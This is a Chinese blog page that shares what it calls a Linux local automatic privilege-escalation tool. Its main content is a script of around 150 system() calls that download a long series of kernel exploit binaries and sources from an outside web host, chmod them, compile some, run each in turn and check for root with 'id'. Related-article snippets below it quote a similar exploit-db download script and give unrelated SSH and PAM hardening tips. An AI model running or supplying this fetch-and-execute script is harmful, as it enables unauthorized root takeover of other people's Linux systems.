linux本地自动溢出获取root权限工具

最新推荐文章于 2022-04-24 09:00:00 发布
最新推荐文章于 2022-04-24 09:00:00 发布
阅读量1.2k 收藏
点赞数

清理了一些连接因为不能访问,或者清除了我的连接的。。。。。留言的连接我已经做好了!

下面应该是是某个国外黑客溢出用的

http://safilooptics.ge/tmp/aa.txt

 

[python] view plain copy print ?
  1. {  
  2. system("wget http://standproje.com/modules/mod_footer/exploit/15");  
  3. system("chmod 777 15");  
  4. system("./15");  
  5. system("id");  
  6. system("wget http://standproje.com/modules/mod_footer/exploit/15150");  
  7. system("chmod 777 15150");  
  8. system("./15150");  
  9. system("id");  
  10. system("wget http://standproje.com/modules/mod_footer/exploit/15200");  
  11. system("chmod 777 15200");  
  12. system("./15200");  
  13. system("id");  
  14. system("wget http://standproje.com/modules/mod_footer/exploit/15201");  
  15. system("chmod 777 15201");  
  16. system("./15201");  
  17. system("id");  
  18. system("wget http://standproje.com/modules/mod_footer/exploit/15620.sh");  
  19. system("chmod 777 15620.sh");  
  20. system("./15620.sh");  
  21. system("id");  
  22. system("wget http://standproje.com/modules/mod_footer/exploit/15704");  
  23. system("chmod 777 15704");  
  24. system("./15704");  
  25. system("id");  
  26. system("wget http://standproje.com/modules/mod_footer/exploit/1704");  
  27. system("chmod 777 1704");  
  28. system("./1704");  
  29. system("id");  
  30. system("wget http://standproje.com/modules/mod_footer/exploit/2.6.30");  
  31. system("chmod 777 2.6.30");  
  32. system("./2.6.30");  
  33. system("id");  
  34. system("wget http://standproje.com/modules/mod_footer/exploit/2.6.37");  
  35. system("chmod 777 2.6.37");  
  36. system("./2.6.37");  
  37. system("id");  
  38. system("wget http://standproje.com/modules/mod_footer/exploit/2010-1");  
  39. system("chmod 777 2010-1");  
  40. system("./2010-1");  
  41. system("id");  
  42. system("wget http://standproje.com/modules/mod_footer/exploit/2010-2");  
  43. system("chmod 777 2010-2");  
  44. system("./2010-2");  
  45. system("id");  
  46. system("wget http://standproje.com/modules/mod_footer/exploit/27");  
  47. system("chmod 777 27");  
  48. system("./27");  
  49. system("id");  
  50. system("wget http://standproje.com/modules/mod_footer/exploit/27-1");  
  51. system("chmod 777 27-1");  
  52. system("./27-1");  
  53. system("id");  
  54. system("wget http://standproje.com/modules/mod_footer/exploit/27704");  
  55. system("chmod 777 27704");  
  56. system("./27704");  
  57. system("id");  
  58. system("wget http://standproje.com/modules/mod_footer/exploit/28");  
  59. system("chmod 777 28");  
  60. system("./28");  
  61. system("id");  
  62. system("wget http://standproje.com/modules/mod_footer/exploit/44");  
  63. system("chmod 777 44");  
  64. system("./44");  
  65. system("id");  
  66. system("wget http://standproje.com/modules/mod_footer/exploit/4a");  
  67. system("chmod 777 4a");  
  68. system("./4a");  
  69. system("id");  
  70. system("wget http://standproje.com/modules/mod_footer/exploit/7");  
  71. system("chmod 777 7");  
  72. system("./7");  
  73. system("id");  
  74. system("wget http://standproje.com/modules/mod_footer/exploit/7-2");  
  75. system("chmod 777 7-2");  
  76. system("./7-2");  
  77. system("id");  
  78. system("wget http://standproje.com/modules/mod_footer/exploit/8");  
  79. system("chmod 777 8");  
  80. system("./8");  
  81. system("id");  
  82. system("wget http://standproje.com/modules/mod_footer/exploit/8x");  
  83. system("chmod 777 8x");  
  84. system("./8x");  
  85. system("id");  
  86. system("wget http://standproje.com/modules/mod_footer/exploit/9");  
  87. system("chmod 777 9");  
  88. system("./9");  
  89. system("id");  
  90. system("wget http://standproje.com/modules/mod_footer/exploit/9521");  
  91. system("chmod 777 9521");  
  92. system("./9521");  
  93. system("id");  
  94. system("wget http://standproje.com/modules/mod_footer/exploit/cmtr");  
  95. system("chmod 777 cmtr");  
  96. system("./cmtr");  
  97. system("id");  
  98. system("wget http://standproje.com/modules/mod_footer/exploit/exp1");  
  99. system("chmod 777 exp1");  
  100. system("./exp1");  
  101. system("id");  
  102. system("wget http://standproje.com/modules/mod_footer/exploit/exp2");  
  103. system("chmod 777 exp2");  
  104. system("./exp2");  
  105. system("id");  
  106. system("wget http://standproje.com/modules/mod_footer/exploit/exp3");  
  107. system("chmod 777 exp3");  
  108. system("./exp3");  
  109. system("id");  
  110. system("wget http://standproje.com/modules/mod_footer/exploit/exploit");  
  111. system("chmod 777 exploit");  
  112. system("./exploit");  
  113. system("id");  
  114. system("wget http://standproje.com/modules/mod_footer/exploit/full-nelson.c");  
  115. system("chmod 777 full-nelson.c");  
  116. system("gcc full-nelson.c -o full-nelson");  
  117. system("chmod 777 full-nelson");  
  118. system("./full-nelson");  
  119. system("wget http://standproje.com/modules/mod_footer/exploit/i-can-haz-modharden.c");  
  120. system("chmod 777 i-can-haz-modharden.c");  
  121. system("gcc i-can-haz-modharden.c -o i-can-haz-modharden");  
  122. system("chmod 777 i-can-haz-modharden");  
  123. system("./i-can-haz-modharden");  
  124. system("id");  
  125. system("wget http://standproje.com/modules/mod_footer/exploit/iskorpitx");  
  126. system("chmod 777 iskorpitx");  
  127. system("./iskorpitx");  
  128. system("id");  
  129. system("wget http://standproje.com/modules/mod_footer/exploit/siy");  
  130. system("chmod 777 siy");  
  131. system("./siy");  
  132. system("id");  
  133. system("wget http://standproje.com/modules/mod_footer/exploit/team-edward.py");  
  134. system("chmod 777 team-edward.py");  
  135. system("python team-edward.py");  
  136. system("id");  
  137. system("wget http://standproje.com/modules/mod_footer/exploit/18-1");  
  138. system("chmod 777 18-1");  
  139. system("wget http://standproje.com/modules/mod_footer/exploit/18-2");  
  140. system("chmod 777 18-2");  
  141. system("wget http://standproje.com/modules/mod_footer/exploit/18-3");  
  142. system("chmod 777 18-3");  
  143. system("wget http://standproje.com/modules/mod_footer/exploit/18-5");  
  144. system("chmod 777 18-5");  
  145. system("./18-1");  
  146. system("id");  
  147. system("./18-2");  
  148. system("id");  
  149. system("./18-3");  
  150. system("id");  
  151. system("./18-5");  
  152. system("id");  
  153. }  

http://blog.csdn.net/bincker/article/details/6552888   原文地址
hack8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux x64 shellcode,栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode...
weixin_42386033的博客
05-12 510
shellcode 是一组指令opcode, 是可以被程序运行,因为shellcode是要直接操作寄存器和函数,所以opcode 必须是十六进制的形式。既然是攻击,那shellcode 主要的目的是调用系统函数,而在x86下 在linux下有两种方式。第一种是通过直接调用中断 int 0x80进入内核态,从而达到调用目的。第二种是通过调用libc里syscall(64位)和sysenter(32位...
linux缓冲区溢出漏洞攻击文件
10-29
4. **获取权限提升**:如果攻击成功,payload被执行,通常会尝试获取更高的权限,如从普通用户权限提升到root权限。这是因为溢出可能会破坏敏感数据,如权限相关的指针,允许攻击者控制系统。 5. **shellcode**:在...
Linux本地自动获取root权限工具
white__cat的专栏
06-18 1307
代码保存为 xx.txt cd /tmp   //进入tmp目录 wget http://localhost/xx.txt  //下载脚本 perl xx.txt   //执行溢出脚本 完全傻瓜化,不过不智能。   下面是代码 #!/usr/bin/perl # 本地自动溢出获取root权限工具 # 如果大牛们的精力多搜集多了,也给我一份小弟 # m
Linux提权辅助工具
LuckySec
04-24 3870
0x01 LinEnum 工具介绍 LinEnum 是一个高级 Bash 脚本,它从目标系统中提取了大量有用的信息,可以复制文件并进行导出,同时可以搜索包含关键字的文件。 项目地址:https://github.com/rebootuser/LinEnum LinEnum 执行的检查/任务的高级摘要: 内核和发行版详细信息 系统信息: 主机名 网络详情 当前IP 默认路由详情 DNS 服务器信息 用户信息: 当前用户详细信息 最后登录的用户
linux 外网ip 不能ssh,问个问题 我机子用公网ip 只开了个ssh服务和22端口
weixin_39756192的博客
05-09 808
该楼层疑似违规已被系统折叠隐藏此楼查看此楼为啥又时候莫名其妙的ip用root登录 我root 登录是禁止的但是日志全都是登录记录很烦怎么设置尝试登录几次后 封禁ip83.56.128.30 port 43800 ssh212月 15 09:37:43 YH203 sshd[15815]: pam_tally(sshd:auth): Tally overflowed for user root12...
Linux下强行拿下root权限 源码分享
09-10
"Linux下强行拿下root权限"这个主题涉及到的是如何通过编程方式在特定条件下获取或切换到root权限。这种操作通常需要深入理解Linux的用户权限模型、sudo机制以及系统调用。 Linux权限系统基于Unix权限模型,分为...
详解Android系统中的root权限获得原理
09-03
Android基于Linux内核,因此其Root权限获取原理与Linux系统下的root用户相似。本文将深入探讨Android系统root权限的获得过程。 首先,了解Linux系统下的root权限获取方式。在Linux中,用户可以通过执行"sudo"或"su...
Linux系统权限总结1
08-03
Linux系统中,权限管理是确保系统安全性和稳定性的重要...在实践中,应时刻牢记最小权限原则,合理配置权限,避免权限溢出和过度授权。同时,了解和利用ACL以及sudo的授权机制,能够实现更为灵活和精确的权限控制。
权限提升-linux提权手法总结.zip
05-08
Linux系统中,权限提升(Privilege Escalation)是指非特权用户通过各种手段获取到更高的权限,如root权限,从而能够对系统进行更广泛的操作。这种行为在系统安全领域中具有重要意义,既包括攻击者试图提升权限以...
用于本机内存溢出分析工具(原)
03-26
NULL 博文链接:https://jonsion.iteye.com/blog/1148167
Linux因15年前的内核漏洞被获得 Root 权限
llawliet0001的专栏
03-28 160
导读 近日,在Linux内核的 iSCSI 子系统中发现的三个漏洞可能会允许具有基本用户权限的本地攻击者在未打补丁的 Linux 系统上获得 root 权限。 这些安全漏洞只能在本地被利用,这意味着潜在的攻击者将不得不通过利用另一个漏洞或使用其他攻击载体来访问受影响的设备。 15年之久的 Linux 内核漏洞 这些漏洞在 2006年 iSCSI 内核子系统的初始开发阶段就被引入,如今时隔 15 年,GRIMM 的研究人员终于发现了这些漏洞。 根据 GRIMM 安全研究员 Adam N..
linux权限溢出,linux本地自动溢出获取root权限工具
weixin_32563411的博客
05-01 112
脚本内容如下:#!/usr/bin/perl# linux本地自动溢出获取root权限工具# chmod 777 getroot.pl# ./getroot.pl{system("wget -O 15704 http://www.exploit-db.com/download/15704");system("gcc -w 15704.c -o 15704");system("chmod 777 1...
linux内核溢出利用,利用Linux内核本地漏洞解决root密码忘记
weixin_28755331的博客
05-13 169
回家期间,同事说有台服务器的root密码不对了,无法通过su - root切换到root,问我如何解决。服务器环境:CentOS 6.3 x86_64 定制版默认登录:服务器添加了普通用户master用于remote ssh login,默认root是禁止直接remote ssh login的,只能通过master登录后,通过su来切换编译环境:gcc 4.4.6在网上查看了下Linux的本地溢出...
多次登录失败用户被锁定及使用Pam_Tally2解锁
weixin_34329187的博客
11-26 5633
linux系统中,用户多次登录失败会被锁定,一段时间内将不能再登录系统,这是一般会用到Pam_Tally2进行账户解锁。 了解PAM Linux-PAM (Pluggable Authentication Modules for Linux)可插拔认证模块。Linux-PAM是一套适用于Linux的身份验证共享库系统,它为系统中的应用程序或服务提供动态身份验证模块支持。在Linux中,PAM是可...
设置Linux用户登录连续N次输入错误限制进行登陆时,自动锁定X分钟(pam_tally2)
beckdim
03-18 4371
(1)这一条登录多少次后就提示并自动结束会话:非常重要,在CentOS6.2中实践Ok,如下:[root@station90 ssh]# cat /etc/ssh/sshd_config  | grep MaxAuthMaxAuthTries 1 //远程用户通过ssh连接登录2次失败后自动结束会话The server has disconnected with an error.  Server...
linux用户解锁pam_tally,Linux使用PAM锁定多次登陆失败的用户(含重置错误次数)...
weixin_34678198的博客
04-28 2470
修改如下文件:/etc/pam.d/sshd (远程ssh)/etc/pam.d/login (终端)在第一行下即#%PAM-1.0的下面添加:auth required pam_tally2.so deny=3 unlock_time=600 even_deny_root root_unlock_time=1200各参数解释:even_deny_root...
Linux使用PAM锁定多次登陆失败的用户(含重置错误次数)
热门推荐
新路的专栏
05-22 5万+
修改如下文件 /etc/pam.d/sshd    (远程ssh) /etc/pam.d/login    (终端) 在第一行下即#%PAM-1.0的下面添加: auth    required    pam_tally2.so    deny=3    unlock_time=600 even_deny_root root_unlock_time=1200 各参数解释: ev
linux运维_ssh配置限制ip访问
Hitler的博客
11-19 3546
ssh配置限制ip访问 打开SSH服务 /etc/init.d/ssh start 修改ssh的配置(关闭root无密码登录) vim /etc/ssh/sshd_config 把配置文件中的 PermitRootLogin without-password前面加一个"#"号,注释掉 增加一句PermitRootLogin yes #root用户需要密码登录 限制IP访问SSH(前提要设置host...
实验 Linux 下的缓冲区溢出实践1
最新发布
08-08
"Linux下的缓冲区溢出实践" 实验"Linux下的缓冲区溢出实践1"主要探讨了在Ubuntu 20.04操作系统和Linux Kernel 5.4.0-53-generic环境下,如何理解和利用缓冲区溢出的机制。缓冲区溢出是一种常见的安全漏洞,当程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值